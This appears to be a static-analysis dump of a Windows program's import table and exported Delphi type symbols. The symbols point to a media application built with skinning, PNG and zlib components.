                                                                                                                      KERNEL32.DLLCloseHandle, CompareStringW, CopyFileW, CreateDirectoryA, CreateDirectoryW, CreateEventW, CreateFileA, CreateFileW, CreateMutexW, CreatePipe, CreateProcessW, CreateThread, DeleteCriticalSection, DeleteFileA, DeleteFileW, EnterCriticalSection, EnumCalendarInfoW, ExitProcess, ExitThread, FileTimeToDosDateTime, FileTimeToLocalFileTime, FileTimeToSystemTime, FindClose, FindCloseChangeNotification, FindFirstChangeNotificationW, FindFirstFileA, FindFirstFileW, FindNextChangeNotification, FindNextFileW, FindResourceW, FlushFileBuffers, FormatMessageW, FreeLibrary, FreeResource, GetACP, GetCPInfo, GetCommandLineW, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDateFormatW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetDriveTypeW, GetEnvironmentStrings, GetEnvironmentStringsW, GetExitCodeProcess, GetExitCodeThread, GetFileAttributesA, GetFileAttributesW, GetFileSize, GetFileSizeEx, GetFileType, GetFullPathNameW, GetLastError, GetLocalTime, GetLocaleInfoA, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetOEMCP, GetPrivateProfileStringW, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStartupInfoW, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemDefaultLangID, GetSystemDefaultUILanguage, GetSystemDirectoryW, GetSystemInfo, GetThreadLocale, GetThreadPriority, GetTickCount, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultUILanguage, GetVersion, GetVersionExA, GetVersionExW, GetVolumeInformationW, GlobalAddAtomW, GlobalAlloc, GlobalDeleteAtom, GlobalFindAtomW, GlobalFree, GlobalHandle, GlobalLock, GlobalSize, GlobalUnlock, HeapAlloc, HeapFree, InitializeCriticalSection, InterlockedCompareExchange, InterlockedDecrement, InterlockedExchange, InterlockedExchangeAdd, InterlockedIncrement, IsDBCSLeadByteEx, IsDebuggerPresent, IsValidLocale, LCMapStringA, LCMapStringW, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LoadResource, LocalAlloc, LocalFree, LockResource, MulDiv, MultiByteToWideChar, OpenProcess, OutputDebugStringW, QueryPerformanceCounter, RaiseException, ReadFile, ReleaseMutex, RemoveDirectoryA, ResetEvent, ResumeThread, RtlUnwind, SetConsoleCtrlHandler, SetCurrentDirectoryA, SetCurrentDirectoryW, SetEndOfFile, SetErrorMode, SetEvent, SetFileAttributesW, SetFilePointer, SetHandleCount, SetLastError, SetThreadExecutionState, SetThreadLocale, SetThreadPriority, SignalObjectAndWait, SizeofResource, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, VirtualQuery, VirtualQueryEx, WaitForMultipleObjects, WaitForMultipleObjectsEx, WaitForSingleObject, WideCharToMultiByte, WriteFile, WritePrivateProfileStringW, lstrcmpW, lstrcmpiA, lstrcpyW, lstrcpynW, lstrlenA, lstrlenW
                                                                                                                      VERSION.DLLGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                      WINSPOOL.DRVClosePrinter, DocumentPropertiesW, EnumPrintersW, OpenPrinterW
                                                                                                                      COMCTL32.DLLFlatSB_GetScrollInfo, FlatSB_GetScrollPos, FlatSB_SetScrollInfo, FlatSB_SetScrollPos, FlatSB_SetScrollProp, ImageList_Add, ImageList_BeginDrag, ImageList_Copy, ImageList_Create, ImageList_Destroy, ImageList_DragEnter, ImageList_DragLeave, ImageList_DragMove, ImageList_DragShowNolock, ImageList_Draw, ImageList_DrawEx, ImageList_EndDrag, ImageList_GetBkColor, ImageList_GetDragImage, ImageList_GetIcon, ImageList_GetIconSize, ImageList_GetImageCount, ImageList_GetImageInfo, ImageList_LoadImageW, ImageList_Read, ImageList_Remove, ImageList_Replace, ImageList_ReplaceIcon, ImageList_SetBkColor, ImageList_SetIconSize, ImageList_SetImageCount, ImageList_SetOverlayImage, ImageList_Write, InitializeFlatSB, _TrackMouseEvent
                                                                                                                      COMDLG32.DLLChooseColorW, GetSaveFileNameW, GetOpenFileNameW
                                                                                                                      GDI32.DLLAbortDoc, Arc, BitBlt, Chord, CombineRgn, CopyEnhMetaFileW, CreateBitmap, CreateBrushIndirect, CreateCompatibleBitmap, CreateCompatibleDC, CreateDCW, CreateDIBSection, CreateDIBitmap, CreateFontIndirectW, CreateHalftonePalette, CreateICW, CreatePalette, CreatePen, CreatePenIndirect, CreateRectRgn, CreateSolidBrush, DeleteDC, DeleteEnhMetaFile, DeleteObject, Ellipse, EndDoc, EndPage, EnumFontFamiliesExW, EnumFontsW, ExcludeClipRect, ExtCreatePen, ExtFloodFill, ExtTextOutW, FrameRgn, GdiFlush, GetBitmapBits, GetBitmapDimensionEx, GetBrushOrgEx, GetClipBox, GetCurrentPositionEx, GetDCOrgEx, GetDIBColorTable, GetDIBits, GetDeviceCaps, GetEnhMetaFileBits, GetEnhMetaFileDescriptionW, GetEnhMetaFileHeader, GetEnhMetaFilePaletteEntries, GetNearestPaletteIndex, GetObjectW, GetPaletteEntries, GetPixel, GetRgnBox, GetStockObject, GetSystemPaletteEntries, GetTextExtentPoint32W, GetTextExtentPointW, GetTextMetricsW, GetViewportOrgEx, GetWinMetaFileBits, GetWindowOrgEx, IntersectClipRect, LineTo, MaskBlt, MoveToEx, PatBlt, Pie, PlayEnhMetaFile, PolyBezier, PolyBezierTo, PolyPolyline, Polygon, Polyline, RealizePalette, RectVisible, Rectangle, ResizePalette, RestoreDC, RoundRect, SaveDC, SelectClipRgn, SelectObject, SelectPalette, SetAbortProc, SetBkColor, SetBkMode, SetBrushOrgEx, SetDIBColorTable, SetDIBits, SetEnhMetaFileBits, SetMapMode, SetPixel, SetPixelV, SetROP2, SetStretchBltMode, SetTextColor, SetViewportExtEx, SetViewportOrgEx, SetWinMetaFileBits, SetWindowExtEx, SetWindowOrgEx, StartDocW, StartPage, StretchBlt, StretchDIBits, UnrealizeObject
                                                                                                                      MSIMG32.DLLAlphaBlend
                                                                                                                      SHELL32.DLLDragAcceptFiles, DragFinish, DragQueryFileW, ExtractIconW, SHBrowseForFolderW, SHGetDesktopFolder, SHGetFileInfoW, SHGetMalloc, SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHGetSpecialFolderPathW, ShellExecuteExW, ShellExecuteW
                                                                                                                      USER32.DLLActivateKeyboardLayout, AdjustWindowRectEx, BeginDeferWindowPos, BeginPaint, CallNextHookEx, CallWindowProcW, CharLowerBuffW, CharLowerW, CharNextW, CharUpperBuffW, CheckMenuItem, ChildWindowFromPoint, ClientToScreen, ClipCursor, CloseClipboard, CopyIcon, CopyImage, CopyRect, CountClipboardFormats, CreateAcceleratorTableW, CreateCaret, CreateIcon, CreateIconIndirect, CreateMenu, CreatePopupMenu, CreateWindowExW, DefFrameProcW, DefMDIChildProcW, DefWindowProcW, DeferWindowPos, DeleteMenu, DestroyCaret, DestroyCursor, DestroyIcon, DestroyMenu, DestroyWindow, DispatchMessageA, DispatchMessageW, DrawEdge, DrawFocusRect, DrawFrameControl, DrawIcon, DrawIconEx, DrawMenuBar, DrawTextExW, DrawTextW, EmptyClipboard, EnableMenuItem, EnableScrollBar, EnableWindow, EndDeferWindowPos, EndPaint, EnumChildWindows, EnumClipboardFormats, EnumThreadWindows, EnumWindows, EqualRect, ExitWindowsEx, FillRect, FindWindowExW, FindWindowW, FrameRect, GetActiveWindow, GetCapture, GetCaretPos, GetClassInfoW, GetClassLongW, GetClassNameW, GetClientRect, GetClipboardData, GetCursor, GetCursorPos, GetDC, GetDCEx, GetDesktopWindow, GetDlgCtrlID, GetDlgItem, GetDoubleClickTime, GetFocus, GetForegroundWindow, GetIconInfo, GetKeyNameTextW, GetKeyState, GetKeyboardLayout, GetKeyboardLayoutList, GetKeyboardLayoutNameW, GetKeyboardState, GetLastActivePopup, GetMenu, GetMenuItemCount, GetMenuItemID, GetMenuItemInfoW, GetMenuItemRect, GetMenuState, GetMenuStringW, GetMessageExtraInfo, GetMessagePos, GetMessageTime, GetParent, GetPropW, GetScrollInfo, GetScrollPos, GetScrollRange, GetSubMenu, GetSysColor, GetSysColorBrush, GetSystemMenu, GetSystemMetrics, GetTopWindow, GetWindow, GetWindowDC, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextLengthW, GetWindowTextW, GetWindowThreadProcessId, InflateRect, InsertMenuItemW, InsertMenuW, IntersectRect, InvalidateRect, IsCharAlphaNumericW, IsCharAlphaW, IsChild, IsClipboardFormatAvailable, IsDialogMessageA, IsDialogMessageW, IsIconic, IsRectEmpty, IsWindow, IsWindowEnabled, IsWindowUnicode, IsWindowVisible, IsZoomed, KillTimer, LoadBitmapW, LoadCursorW, LoadIconW, LoadImageW, LoadKeyboardLayoutW, LoadStringW, LockWindowUpdate, MapVirtualKeyW, MapWindowPoints, MessageBeep, MessageBoxA, MessageBoxW, MoveWindow, MsgWaitForMultipleObjects, MsgWaitForMultipleObjectsEx, OemToCharBuffW, OffsetRect, OpenClipboard, PeekMessageA, PeekMessageW, PostMessageW, PostQuitMessage, PtInRect, RedrawWindow, RegisterClassW, RegisterClipboardFormatW, RegisterWindowMessageW, ReleaseCapture, ReleaseDC, RemoveMenu, RemovePropW, ScreenToClient, ScrollWindow, ScrollWindowEx, SendMessageA, SendMessageW, SetActiveWindow, SetCapture, SetCaretPos, SetClassLongW, SetClipboardData, SetCursor, SetCursorPos, SetFocus, SetForegroundWindow, SetKeyboardState, SetMenu, SetMenuItemInfoW, SetParent, SetPropW, SetRect, SetScrollInfo, SetScrollPos, SetScrollRange, SetTimer, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowRgn, SetWindowTextW, SetWindowsHookExW, ShowOwnedPopups, ShowScrollBar, ShowWindow, SystemParametersInfoW, TrackPopupMenu, TranslateMDISysAccel, TranslateMessage, UnhookWindowsHookEx, UnregisterClassW, UpdateLayeredWindow, UpdateWindow, ValidateRect, WaitMessage, WindowFromDC, WindowFromPoint, wsprintfA, wsprintfW
                                                                                                                      WINMM.DLLtimeGetTime
                                                                                                                      OLE32.DLLCLSIDFromString, CoCreateInstance, CoInitialize, CoTaskMemAlloc, CoTaskMemFree, CoUninitialize, IsEqualGUID, OleInitialize, OleUninitialize
                                                                                                                      OLEAUT32.DLLGetErrorInfo, SafeArrayCreate, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayPtrOfIndex, SysAllocString, SysAllocStringLen, SysFreeString, SysReAllocStringLen, VariantChangeType, VariantClear, VariantCopy, VariantInit
                                                                                                                      SHELL32.DLL
                                                                                                                      GDIPLUS.DLLGdiplusStartup, GdiplusShutdown, GdipReleaseDC, GdipLoadImageFromFileICM, GdipLoadImageFromFile, GdipGetImageWidth, GdipGetImageHeight, GdipFree, GdipDrawImageRectI, GdipDisposeImage, GdipDeleteGraphics, GdipCreateFromHDC, GdipCloneImage, GdipAlloc
                                                                                                                      NameOrdinalAddress
                                                                                                                      @$xp$10TFrameList2920x5a0f20
                                                                                                                      @$xp$11Sconst@TAOR11190x5dcd70
                                                                                                                      @$xp$11TMyCheckBox1690x5923d4
                                                                                                                      @$xp$11TMyIconList3120x5a3818
                                                                                                                      @$xp$11TMyListView3750x5ada7c
                                                                                                                      @$xp$11TMyTrackBar4350x5b0274
                                                                                                                      @$xp$12Sconst@TsRGB11470x5dd7c4
                                                                                                                      @$xp$12Sedit@TsEdit11730x5ded30
                                                                                                                      @$xp$12Smemo@TsMemo16290x605fe0
                                                                                                                      @$xp$12TMyVolumeBar4940x5b2bf0
                                                                                                                      @$xp$13Sconst@TsRGBA11480x5dd808
                                                                                                                      @$xp$13Slabel@TsKind15060x5fe468
                                                                                                                      @$xp$13Spanel@TsGrip17770x610e6c
                                                                                                                      @$xp$13TChangeButton1530x5919e0
                                                                                                                      @$xp$13TMyDVDListBox2670x59dd64
                                                                                                                      @$xp$13Zlibex@TZFree38980x6bc128
                                                                                                                      @$xp$14Acpng@Acpng__134350x694d90
                                                                                                                      @$xp$14Acpng@Acpng__434470x695910
                                                                                                                      @$xp$14Sconst@PPoints11390x5dd520
                                                                                                                      @$xp$14Sconst@TPoints11400x5dd534
                                                                                                                      @$xp$14Sconst@TacRoot11220x5dce64
                                                                                                                      @$xp$14Sconst@TsColor11490x5dd858
                                                                                                                      @$xp$14Sgauge@TsGauge12190x5e1ba0
                                                                                                                      @$xp$14Slabel@TsLabel15000x5fddf0
                                                                                                                      @$xp$14Spanel@TsPanel17710x610688
                                                                                                                      @$xp$14TMyNoticeBoard3950x5aed34
                                                                                                                      @$xp$14TMyProgressBar4300x5b000c
                                                                                                                      @$xp$14Zlibex@TZAlloc38970x6bc0e4
                                                                                                                      @$xp$14Zlibex@TZError39010x6bc250
                                                                                                                      @$xp$15Sconst@TPercent11410x5dd560
                                                                                                                      @$xp$15Sconst@TsColor_11500x5dd8f0
                                                                                                                      @$xp$15Slabel@TAlignTo15090x5fe808
                                                                                                                      @$xp$15Slabel@TsShadow14950x5fd1ac
                                                                                                                      @$xp$15TMyPlayProgress4160x5af87c
                                                                                                                      @$xp$15TMyVideoCapture4830x5b24e8
                                                                                                                      @$xp$16Acpng@TByteArray34420x695568
                                                                                                                      @$xp$16Acpng@TChunkType34520x695aec
                                                                                                                      @$xp$16Sbitbtn@TsBitBtn6130x5bc298
                                                                                                                      @$xp$16Sbutton@TsButton8780x5ce8a0
                                                                                                                      @$xp$16Sconst@PACString11180x5dcd58
                                                                                                                      @$xp$16Sconst@PRGBArray11510x5dd98c
                                                                                                                      @$xp$16Sconst@PacBGInfo11350x5dd3c0
                                                                                                                      @$xp$16Sconst@Sconst__211550x5dda04
                                                                                                                      @$xp$16Sconst@Sconst__311570x5dda58
                                                                                                                      @$xp$16Sconst@Sconst__411590x5ddaa8
                                                                                                                      @$xp$16Sconst@TRGBArray11520x5dd9a4
                                                                                                                      @$xp$16Sconst@TacBGInfo11370x5dd418
                                                                                                                      @$xp$16Sconst@TacBGType11360x5dd3d8
                                                                                                                      @$xp$16Slabel@TsLabelFX15080x5fe76c
                                                                                                                      @$xp$16Spanel@TsColInfo17780x610e90
                                                                                                                      @$xp$16Spanel@TsDragBar17730x6109ac
                                                                                                                      @$xp$16Supdown@TsUpDown28170x665154
                                                                                                                      @$xp$16TMyVariablePanel4510x5b0e1c
                                                                                                                      @$xp$17Acpng@TFloatArray34440x6955c4
                                                                                                                      @$xp$17Acpng@TPNGGraphic34550x695ff4
                                                                                                                      @$xp$17Sconst@PRGBAArray11530x5dd9c8
                                                                                                                      @$xp$17Sconst@TCacheInfo11380x5dd4b0
                                                                                                                      @$xp$17Sconst@TDateOrder11620x5ddb64
                                                                                                                      @$xp$17Sconst@TRGBAArray11540x5dd9e0
                                                                                                                      @$xp$17Sconst@TacImgType11300x5dd018
                                                                                                                      @$xp$17Sfade@TsAnimTimer13270x5e987c
                                                                                                                      @$xp$17Sfade@TsFadeTimer13250x5e95ac
                                                                                                                      @$xp$17Sgraphutils@TsHSV13500x5ea2d8
                                                                                                                      @$xp$17Slabel@TsKindType14930x5fcfc8
                                                                                                                      @$xp$17Slabel@TsWebLabel15040x5fe298
                                                                                                                      @$xp$17Supdown@TsBtnKind28150x664e9c
                                                                                                                      @$xp$17TMyDropdownButton2250x599f7c
                                                                                                                      @$xp$17Zlibex@EZLibError39110x6bcbf4
                                                                                                                      @$xp$17Zlibex@TZStrategy39000x6bc1fc
                                                                                                                      @$xp$18Acpng@TColorScheme34340x694d08
                                                                                                                      @$xp$18Acpng@TLZ77Decoder34460x695858
                                                                                                                      @$xp$18Sconst@TDaysOfWeek11610x5ddb4c
                                                                                                                      @$xp$18Sconst@TPaintEvent11200x5dcd98
                                                                                                                      @$xp$18Sconst@TacAnimType11240x5dceb4
                                                                                                                      @$xp$18Sconst@TacBtnEvent11250x5dceec
                                                                                                                      @$xp$18Sconst@TacCtrlType11270x5dcf60
                                                                                                                      @$xp$18Sconst@TacFillMode11310x5dd07c
                                                                                                                      @$xp$18Sconst@TsCtrlClass11320x5dd174
                                                                                                                      @$xp$18Sconst@TsHintStyle11420x5dd57c
                                                                                                                      @$xp$18Sgauge@TsGaugeKind12170x5e1704
                                                                                                                      @$xp$18Slabel@TsEditLabel15020x5fe024
                                                                                                                      @$xp$18Smdiform@TsMDIForm16150x605aa0
                                                                                                                      @$xp$18Spanel@TsContainer17750x610bd8
                                                                                                                      @$xp$18Stoolbar@TsToolBar26810x65e5b4
                                                                                                                      @$xp$18Zlibex@TZStreamRec39020x6bc2c0
                                                                                                                      @$xp$19Acdials@TacMnuArray29790x66d140
                                                                                                                      @$xp$19Acdials@TacProvider29780x66d114
                                                                                                                      @$xp$19Acpng@TColorManager34410x69533c
                                                                                                                      @$xp$19Acpng@TImageOptions34480x695944
                                                                                                                      @$xp$19Acsbutils@TacBtnWnd30970x675c14
                                                                                                                      @$xp$19Acsbutils@TacMDIWnd31250x677b10
                                                                                                                      @$xp$19Acsbutils@TacMnuWnd31210x677888
                                                                                                                      @$xp$19Acsbutils@TacTabWnd31150x677220
                                                                                                                      @$xp$19Sconst@TacBtnEvents11260x5dcf44
                                                                                                                      @$xp$19Sgradient@TRIVERTEX12610x5e48e4
                                                                                                                      @$xp$19Sgradient@TsGradPie12600x5e486c
                                                                                                                      @$xp$19Sgraphutils@TKernel13570x5ea420
                                                                                                                      @$xp$19Slabel@TsShadowMode14920x5fcf88
                                                                                                                      @$xp$20Acdials@TacDialogWnd29760x66cdc4
                                                                                                                      @$xp$20Acglow@TacGlowEffect29340x66988c
                                                                                                                      @$xp$20Acpng@TCardinalArray34430x695594
                                                                                                                      @$xp$20Acsbutils@TacBaseWnd31230x677974
                                                                                                                      @$xp$20Acsbutils@TacEditWnd31270x677d80
                                                                                                                      @$xp$20Acsbutils@TacGridWnd31330x6787cc
                                                                                                                      @$xp$20Acsbutils@TacIconWnd30910x6753a8
                                                                                                                      @$xp$20Acsbutils@TacLinkWnd30950x675754
                                                                                                                      @$xp$20Acsbutils@TacMainWnd30870x675080
                                                                                                                      @$xp$20Acsbutils@TacPageWnd31470x679b60
                                                                                                                      @$xp$20Acsbutils@TacSpinWnd31050x6764e4
                                                                                                                      @$xp$20Salphagraph@TsCorner6570x5bef4c
                                                                                                                      @$xp$20Scalcunit@TsCalcForm35310x6a0f78
                                                                                                                      @$xp$20Scheckbox@TsCheckBox14540x5fa764
                                                                                                                      @$xp$20Scombobox@TsComboBox9120x5d1480
                                                                                                                      @$xp$20Scurredit@TsCalcEdit9770x5d6fe4
                                                                                                                      @$xp$20Sgroupbox@TsGroupBox12820x5e73e4
                                                                                                                      @$xp$20Slabel@TsCustomLabel14970x5fd4e0
                                                                                                                      @$xp$20Slabel@TsStickyLabel15110x5fea84
                                                                                                                      @$xp$20Slistview@TsListView15610x601004
                                                                                                                      @$xp$20Smaskdata@TsMaskData15860x60416c
                                                                                                                      @$xp$20Smaskedit@TsMaskEdit15970x604a40
                                                                                                                      @$xp$20Spanel@TsColorsPanel17810x611468
                                                                                                                      @$xp$20Sspinedit@TsSpinEdit24870x652f80
                                                                                                                      @$xp$20Ssplitter@TsSplitter25940x656fb4
                                                                                                                      @$xp$20Stooledit@TsDateEdit27170x661ed4
                                                                                                                      @$xp$20Streeview@TsTreeView28050x6648cc
                                                                                                                      @$xp$21Acdials@TacSystemMenu29740x66bec4
                                                                                                                      @$xp$21Acglow@TacGlowEffects29350x6698b8
                                                                                                                      @$xp$21Acpng@TConvertOptions34360x694df4
                                                                                                                      @$xp$21Acpng@TPNGChunkHeader34530x695b10
                                                                                                                      @$xp$21Acsbutils@TacPanelWnd31190x6776b8
                                                                                                                      @$xp$21Acsbutils@TacSizerWnd31030x676260
                                                                                                                      @$xp$21Salphagraph@TacFast246600x5bf0ec
                                                                                                                      @$xp$21Salphagraph@TacFast326620x5bf320
                                                                                                                      @$xp$21Salphagraph@TsCorners6580x5befa8
                                                                                                                      @$xp$21Scalcunit@TsCalcState35290x69f848
                                                                                                                      @$xp$21Sconst@TBmpPaintEvent11210x5dce00
                                                                                                                      @$xp$21Sconst@TFadeDirection11230x5dce74
                                                                                                                      @$xp$21Sconst@TGradientTypes11440x5dd684
                                                                                                                      @$xp$21Sconst@TacAnimatEvent11280x5dcf94
                                                                                                                      @$xp$21Sconst@TsDisabledKind11580x5dda8c
                                                                                                                      @$xp$21Sdialogs@TsOpenDialog10200x5d8f44
                                                                                                                      @$xp$21Sdialogs@TsPathDialog10300x5d98c0
                                                                                                                      @$xp$21Sdialogs@TsSaveDialog10240x5d926c
                                                                                                                      @$xp$21Sdialogs@TsZipShowing10180x5d8df0
                                                                                                                      @$xp$21Sgradient@TsGradArray12620x5e4960
                                                                                                                      @$xp$21Smaskdata@TsMaskArray15890x60463c
                                                                                                                      @$xp$21Spagecontrol@TsTabBtn17100x60a29c
                                                                                                                      @$xp$21Stooledit@TYearDigits27120x661524
                                                                                                                      @$xp$21Zlibex@TCustomZStream39040x6bc4e4
                                                                                                                      @$xp$22Acdials@TacBorderStyle29720x66b920
                                                                                                                      @$xp$22Acpng@PImageProperties34500x6959a4
                                                                                                                      @$xp$22Acpng@TCompressionType34490x695960
                                                                                                                      @$xp$22Acpng@TImageProperties34510x6959c0
                                                                                                                      @$xp$22Acsbutils@Acsbutils__130760x67422c
                                                                                                                      @$xp$22Acsbutils@TacBitBtnWnd30990x675e20
                                                                                                                      @$xp$22Acsbutils@TacButtonWnd31010x676130
                                                                                                                      @$xp$22Acsbutils@TacGridEhWnd31350x6788b8
                                                                                                                      @$xp$22Acsbutils@TacScrollBar30830x674628
                                                                                                                      @$xp$22Acsbutils@TacScrollWnd31170x677428
                                                                                                                      @$xp$22Acsbutils@TacStaticWnd30890x6751e4
                                                                                                                      @$xp$22Scomboboxes@TsColorBox7260x5c71b4
                                                                                                                      @$xp$22Scomboedit@TsComboEdit9470x5d5868
                                                                                                                      @$xp$22Sconst@TacAnimatEvents11290x5dcffc
                                                                                                                      @$xp$22Sconst@TsCaptionLayout11600x5ddaf4
                                                                                                                      @$xp$22Sconst@TsHackedControl11340x5dd294
                                                                                                                      @$xp$22Sdefaults@Sdefaults__111680x5de720
                                                                                                                      @$xp$22Sdefaults@Sdefaults__211690x5de768
                                                                                                                      @$xp$22Sdialogs@TsColorDialog10280x5d9630
                                                                                                                      @$xp$22Sgraphutils@PRGBArrays13520x5ea38c
                                                                                                                      @$xp$22Sgraphutils@TRGBArrays13530x5ea3a4
                                                                                                                      @$xp$22Sgroupbox@TsRadioGroup12850x5e7930
                                                                                                                      @$xp$22Slabel@TsClassSkinData14980x5fdc2c
                                                                                                                      @$xp$22Sscrollbox@TsScrollBox18810x616ee4
                                                                                                                      @$xp$22Sskinmenus@TacMenuInfo21150x62e790
                                                                                                                      @$xp$22Sspinedit@Sspinedit__524900x653428
                                                                                                                      @$xp$22Sspinedit@TsSpinButton24830x652380
                                                                                                                      @$xp$22Sspinedit@TsTimePicker24960x653a40
                                                                                                                      @$xp$22Sstatusbar@TsStatusBar26070x657e90
                                                                                                                      @$xp$22Supdown@TsDrawingState28140x664e3c
                                                                                                                      @$xp$22Svclutils@TacHideTimer5020x5b32d8
                                                                                                                      @$xp$22Zlibex@EZLibErrorClass39090x6bcab4
                                                                                                                      @$xp$23Acpng@TConversionMethod34380x694ec4
                                                                                                                      @$xp$23Acpng@TRawPaletteFormat34370x694e10
                                                                                                                      @$xp$23Acpng@_TColorManager@_134390x694f30
                                                                                                                      @$xp$23Acsbutils@TDropMarkMode30740x67408c
                                                                                                                      @$xp$23Acsbutils@TacToolBarWnd31090x676c8c
                                                                                                                      @$xp$23Acsbutils@TacWinControl31550x67a830
                                                                                                                      @$xp$23Acskinpack@TacImageItem38820x6b5454
                                                                                                                      @$xp$23Scomboboxes@TsComboItem7300x5c7f24
                                                                                                                      @$xp$23Sconst@TsShadowingShape11450x5dd6d4
                                                                                                                      @$xp$23Sconst@TsWindowShowMode11460x5dd718
                                                                                                                      @$xp$23Sglyphutils@TsGlyphMode9540x5d6368
                                                                                                                      @$xp$23Sgraphutils@PByteArrays13540x5ea3c8
                                                                                                                      @$xp$23Sgraphutils@TByteArrays13550x5ea3e0
                                                                                                                      @$xp$23Sgraphutils@TFilterType13510x5ea31c
                                                                                                                      @$xp$23Sgraphutils@TKernelSize13560x5ea404
                                                                                                                      @$xp$23Smaskdata@TsGeneralData15880x604308
                                                                                                                      @$xp$23Smaskdata@TsPatternData15870x604298
                                                                                                                      @$xp$23Spagecontrol@TsTabSheet17120x60a62c
                                                                                                                      @$xp$23Spanel@TsStdColorsPanel17830x61179c
                                                                                                                      @$xp$23Sscrollbox@TsPaintEvent18790x616928
                                                                                                                      @$xp$23Sspinedit@TTimeBtnState24910x653464
                                                                                                                      @$xp$23Sstylesimply@TsSkinData26470x65a4d8
                                                                                                                      @$xp$23Stooledit@TOnAcceptDate27130x661568
                                                                                                                      @$xp$23Stooledit@TsFileDirEdit27030x660ab4
                                                                                                                      @$xp$23Svclutils@TOutputWindow5000x5b2f5c
                                                                                                                      @$xp$24Acsbutils@TacCheckBoxWnd31070x6768f8
                                                                                                                      @$xp$24Acsbutils@TacComboBoxWnd31390x678dd8
                                                                                                                      @$xp$24Acsbutils@TacDlgPanelWnd30930x675630
                                                                                                                      @$xp$24Acsbutils@TacGroupBoxWnd31130x677038
                                                                                                                      @$xp$24Acsbutils@TacListViewWnd31310x6784a4
                                                                                                                      @$xp$24Acsbutils@TacTreeViewWnd31370x678a14
                                                                                                                      @$xp$24Acskinpack@TacImageItems38830x6b54bc
                                                                                                                      @$xp$24Salphagraph@TacFastSum246640x5bf608
                                                                                                                      @$xp$24Salphagraph@TacFastSum326660x5bf8a4
                                                                                                                      @$xp$24Scolordialog@TColorArray38290x6b1858
                                                                                                                      @$xp$24Scomboboxes@TsComboBoxEx7340x5c8678
                                                                                                                      @$xp$24Scomboboxes@TsComboItems7280x5c7cd4
                                                                                                                      @$xp$24Scommondata@TsBoundLabel5580x5b82bc
                                                                                                                      @$xp$24Scommondata@TsCommonData5560x5b7fd0
                                                                                                                      @$xp$24Sconst@TPopupWindowAlign11630x5ddb9c
                                                                                                                      @$xp$24Sgradient@TsGradFillMode12590x5e4828
                                                                                                                      @$xp$24Smaskdata@TsPatternArray15900x604670
                                                                                                                      @$xp$24Smessages@PacSectionInfo16390x606630
                                                                                                                      @$xp$24Smessages@TacSectionInfo16380x6065f8
                                                                                                                      @$xp$24Spanel@_TsColorsPanel@_117790x610ef4
                                                                                                                      @$xp$24Sskinmanager@TacFormHide19150x6193e0
                                                                                                                      @$xp$24Sskinmanager@TacFormShow19130x619318
                                                                                                                      @$xp$24Sskinmanager@TacSkinInfo19070x618fd4
                                                                                                                      @$xp$24Sskinmanager@TsSkinImage19290x61a6e4
                                                                                                                      @$xp$24Sskinmenus@Sskinmenus__321180x62f1b8
                                                                                                                      @$xp$24Sskinmenus@TMenuItemData21140x62e750
                                                                                                                      @$xp$24Sskinprovider@TsGripMode21730x633c98
                                                                                                                      @$xp$24Sspinedit@TacTimePortion24940x65373c
                                                                                                                      @$xp$24Sspinedit@TsBaseSpinEdit24850x652c2c
                                                                                                                      @$xp$24Stabcontrol@TsTabControl26600x65bad8
                                                                                                                      @$xp$24Stooledit@TsFilenameEdit27090x660e9c
                                                                                                                      @$xp$25Acsbutils@TacComboListWnd31290x677ffc
                                                                                                                      @$xp$25Acsbutils@TacStatusBarWnd31530x67a6ac
                                                                                                                      @$xp$25Acthdtimer@TacTimerThread29540x66b3f8
                                                                                                                      @$xp$25Scolordialog@TAccessPanel38330x6b3144
                                                                                                                      @$xp$25Scomboboxes@TsCommonCombo7140x5c634c
                                                                                                                      @$xp$25Scurredit@TsCustomNumEdit9750x5d6d08
                                                                                                                      @$xp$25Sgroupbox@TsCaptionLayout12800x5e6fbc
                                                                                                                      @$xp$25Sskinmanager@TacSkinTypes19040x618e40
                                                                                                                      @$xp$25Sskinmanager@TsSkinImages19330x61ad30
                                                                                                                      @$xp$25Sskinmanager@TsStoredSkin19370x61b1e4
                                                                                                                      @$xp$25Sskinmenus@TacMenuSupport21130x62e664
                                                                                                                      @$xp$25Sskinmenus@TsMenuItemType21100x62e3cc
                                                                                                                      @$xp$25Sskinprovider@TsTitleIcon21840x6345d8
                                                                                                                      @$xp$25Stooledit@TFileDialogKind27070x660c08
                                                                                                                      @$xp$25Stooledit@TsDirectoryEdit27110x661390
                                                                                                                      @$xp$25Zlibex@EZCompressionError39130x6bccbc
                                                                                                                      @$xp$25Zlibex@TZCompressionLevel38990x6bc15c
                                                                                                                      @$xp$26Acsbutils@THeaderPaintInfo30750x6740d4
                                                                                                                      @$xp$26Acsbutils@TacTabControlWnd31450x679934
                                                                                                                      @$xp$26Acsbutils@TacToolBarVCLWnd31510x67a224
                                                                                                                      @$xp$26Acsbutils@TacTransPanelWnd31110x676dc8
                                                                                                                      @$xp$26Acsbutils@TacWWComboBoxWnd31430x67937c
                                                                                                                      @$xp$26Acshellctrls@IDetInterface36370x6a4648
                                                                                                                      @$xp$26Acshellctrls@IShellDetails36360x6a460c
                                                                                                                      @$xp$26Acshellctrls@TacRootFolder36270x6a4240
                                                                                                                      @$xp$26Scombobox@TsCustomComboBox9100x5d1038
                                                                                                                      @$xp$26Sconst@TsDisabledGlyphKind11560x5dda38
                                                                                                                      @$xp$26Sglyphutils@Sglyphutils__29550x5d64c0
                                                                                                                      @$xp$26Slistview@TsCustomListView15590x600b80
                                                                                                                      @$xp$26Spagecontrol@TsPageControl17140x60ab8c
